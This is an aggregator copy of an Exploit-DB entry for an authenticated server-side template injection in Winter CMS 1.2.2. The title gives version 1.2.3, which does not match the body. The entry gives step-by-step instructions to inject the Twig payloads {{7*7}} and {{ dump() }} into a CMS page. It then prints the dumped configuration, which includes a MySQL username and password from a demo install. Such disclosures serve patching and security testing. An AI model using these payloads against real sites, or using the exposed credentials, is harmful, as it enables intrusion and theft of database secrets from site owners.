3

[webapps] Winter CMS 1.2.3 - Server-Side Template Injection (SSTI) (Authenticate...

 1 month ago
source link: https://www.exploit-db.com/exploits/51893
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

Winter CMS 1.2.3 - Server-Side Template Injection (SSTI) (Authenticated)

EDB-ID:

51893

EDB Verified:

Exploit:

  /  

Platform:

PHP

Date:

2024-03-16

Vulnerable App:

# Exploit Title: Winter CMS 1.2.2 - Server-Side Template Injection (SSTI) (Authenticated)
# Exploit Author: tmrswrr
# Date: 12/05/2023
# Vendor: https://wintercms.com/
# Software Link: https://github.com/wintercms/winter/releases/v1.2.2
# Vulnerable Version(s): 1.2.2
#Tested : https://www.softaculous.com/demos/WinterCMS


1 ) Login with admin cred and click CMS > Pages field > Plugin components > 
    https://demos6.demo.com/WinterCMS/backend/cms#secondarytab-cmslangeditormarkup
2 ) Write SSTI payload : {{7*7}}
3 ) Save it , Click Priview : 
    https://demos6.demo.com/WinterCMS/demo/plugins
4 ) You will be see result : 
    49
 Payload :
    {{ dump() }}
 Result :
 
        "*::database" => array:4 [▼
          "default" => "mysql"
          "connections" => array:4 [▼
            "sqlite" => array:5 [▼
              "database" => "/home/soft/public_html/WinterCMSmcviotyn9i/storage/database.sqlite"
              "driver" => "sqlite"
              "foreign_key_constraints" => true
              "prefix" => ""
              "url" => null
            ]
            "mysql" => array:15 [▼
              "charset" => "utf8mb4"
              "collation" => "utf8mb4_unicode_ci"
              "database" => "soft_pw3qsny"
              "driver" => "mysql"
              "engine" => "InnoDB"
              "host" => "localhost"
              "options" => []
              "password" => "8QSz9(pT)3"
              "port" => 3306
              "prefix" => ""
              "prefix_indexes" => true
              "strict" => true
              "unix_socket" => ""
              "url" => null
              "username" => "soft_pw3qsny"
            ]
            "pgsql" => array:12 [▶]
            "sqlsrv" => array:10 [▶]
          ]
          "migrations" => "migrations"
          "redis" => array:4 [▼
            "client" => "phpredis"
            "options" => array:2 [▼
              "cluster" => "redis"
              "prefix" => "winter_database_"
            ]
            "default" => array:5 [▼
              "database" => "0"
              "host" => "127.0.0.1"
              "password" => null
              "port" => "6379"
              "url" => null
            ]
            "cache" => array:5 [▼
              "database" => "1"
              "host" => "127.0.0.1"
              "password" => null
              "port" => "6379"
              "url" => null
            ]
          ]
        ]
      ]

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK